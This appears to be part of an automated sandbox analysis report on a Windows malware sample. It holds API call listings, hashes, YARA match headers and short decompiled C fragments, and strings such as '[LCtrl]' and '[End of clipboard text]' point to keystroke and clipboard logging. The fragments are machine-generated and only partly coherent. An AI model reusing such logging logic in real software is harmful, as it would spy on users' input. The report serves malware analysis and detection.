                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 2505548081-0
                                  • Opcode ID: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                  • Instruction ID: d80b3b6c6aed89596c133f447bcdc90fdca9c0e00c1408e091cb816f9a065f40
                                  • Opcode Fuzzy Hash: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                  • Instruction Fuzzy Hash: A5F0F23240011EEFCF04EF94DC58CEE7B78FF88255B008829F926971A0EB70AA15CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                  • SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@V01@@Y?$basic_string@$??1?$basic_string@Event
                                  • String ID:
                                  • API String ID: 3911305588-0
                                  • Opcode ID: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                  • Instruction ID: de7088bd0e13ff88ad3ed09bf1a5158b73f18205d37a60fa436fa72f9884fc0a
                                  • Opcode Fuzzy Hash: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                  • Instruction Fuzzy Hash: 06F08231400B49EFCB11DF60D848AD77FA8EF05244F448469E48382961D774F588CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E0040DCD4() {
                                  				void* _t15;
                                  				intOrPtr _t19;
                                  
                                  				E0040AC8C();
                                  				exit(0);
                                  				while(1) {
                                  					_t19 =  *0x41beb8; // 0x0
                                  					if(_t19 == 0) {
                                  						break;
                                  					}
                                  					Sleep(0x64);
                                  				}
                                  				E00408245();
                                  				E004017DD(_t15 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • exit.MSVCRT ref: 0040DCDB
                                  • Sleep.KERNEL32(00000064), ref: 0040DCED
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ObjectProcessSingleSleepTerminateWaitexit
                                  • String ID:
                                  • API String ID: 772260455-0
                                  • Opcode ID: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                  • Instruction ID: 3edd35d2a09f3996059eabe09ae33406840b09248e651dbbdf397ea46066b4da
                                  • Opcode Fuzzy Hash: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                  • Instruction Fuzzy Hash: 8DE0E531918619DFE304ABE1ED59BDD7730AB60346F50443AE603A60E1DAF9051ADB1A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [LCtrl] ,?), ref: 00406B97
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                  • String ID: [LCtrl] $ [RCtrl]
                                  • API String ID: 4257247948-618823999
                                  • Opcode ID: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                  • Instruction ID: 4f70cad60a3ff704afd3fe8ce3074508994e3182d9d4e745bddae8050266d9bd
                                  • Opcode Fuzzy Hash: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                  • Instruction Fuzzy Hash: 60E092B17106147FEA14A66DD81BEFF36BCDB80754F40017AE802E72C1D9E96D4086EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,00000001), ref: 0040D8E1
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D8EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@?c_str@?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?length@?$basic_string@ExecuteG@1@@ShellV01@@
                                  • String ID: open
                                  • API String ID: 317973523-2758837156
                                  • Opcode ID: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                  • Instruction ID: 6a6c3e705ca9fa4d3d03dab41846ccb6958ded06a858cdbf50d377e36584e32d
                                  • Opcode Fuzzy Hash: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                  • Instruction Fuzzy Hash: 5BE04F71504608EEDB056AB09CC5DFA336CA744345F50056AB006A20D1D9744D454628
                                  Uniqueness

                                  Uniqueness Score: -1.00%